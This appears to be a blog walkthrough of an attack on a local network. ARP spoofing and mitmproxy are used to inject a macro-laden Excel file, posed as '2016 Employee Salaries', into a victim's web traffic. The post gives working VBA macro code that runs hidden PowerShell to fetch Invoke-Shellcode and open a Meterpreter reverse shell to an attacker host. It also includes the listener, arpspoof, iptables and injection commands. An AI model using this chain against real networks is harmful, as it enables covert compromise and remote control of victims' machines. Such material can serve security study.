The idea with this particular attack is to inject a malicious file into the victim’s packet stream when they visit a non-https webpage. For example, the default website for Internet Explorer is http://www.msn.com. So, when the victim opens their web browser, we can (after a successful MiTM attack) inject our malicious file in hopes that they will run it.
Local LAN attack box: 172.17.130.53 (Kali Linux)
Local LAN victim: 172.17.130.75 (Windows 7 with IE 11, fully patched)
Public AWS server: 18.104.22.168
Internal AWS LAN IP: 172.31.18.189
Ideally, we want to remain undetected by AV, so we’ve embedded our malicious code with a macro-enabled Excel document. If/When the victim runs the file and clicks to enable macros when prompted, a Powershell command is executed that downloads Invoke-Shellcode (written by Matt Graber) and runs it entirely within memory so as to continue to remain undetected by AV.
First, we need to craft our malicious Excel document. This is covered in a separate post, but the basic VBA code looks like this:
Private Sub Auto_Open()
strCommand = “powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1 ‘);invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost 22.214.171.124 -Lport 8443”
Set WshShell = CreateObject(“WScript.Shell”)
Set WshShellExec = WshShell.Exec(strCommand)
We also need a place to host our malicious file, which we’ve is seen below:
Next, we setup our metasploit listener, which is being done on an AWS box:
./msfconsole -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run”
AWS NAT rules to forward incoming 8443 traffic:
We now need to execute a MiTM attack on the victim. If we check the ARP table on our victim PC, we can see how it looks before ARP spoofing:
After running the following three commands on our local attack box, we’ll have successfully implemented our MiTM attack:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t routerIP victimIP
arpspoof -i eth0 -t victimIP routerIP
Below is what we’ll see, on our local attack box:
If we look again at the victim PC, we can see the change to the ARP tables:
Once the MiTM attack is fully in place, we can now execute the following two commands on our local attack box to proxy all traffic on port 80 to port 8080:
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 8080
./mitmproxy -T -s “iframe_injector.py http://aws.shellgam3.com/files/2016%20Employee%20Salaries.xlsm”
The first argument runs mitmproxy in transparent proxy mode so that we can view incoming traffic on port 8080. The second argument runs a script that injects our macro-enabled Excel document into the victim’s web browser, hosted at AWS.
When the victim visits any non-http site (like MSN.com), they should see something similar within their browser:
Within the mitmproxy console, we should see the injection:
When the file is opened by the victim, we should (hopefully) have our reverse shell. Even when the victim closes Excel, the shell should persist.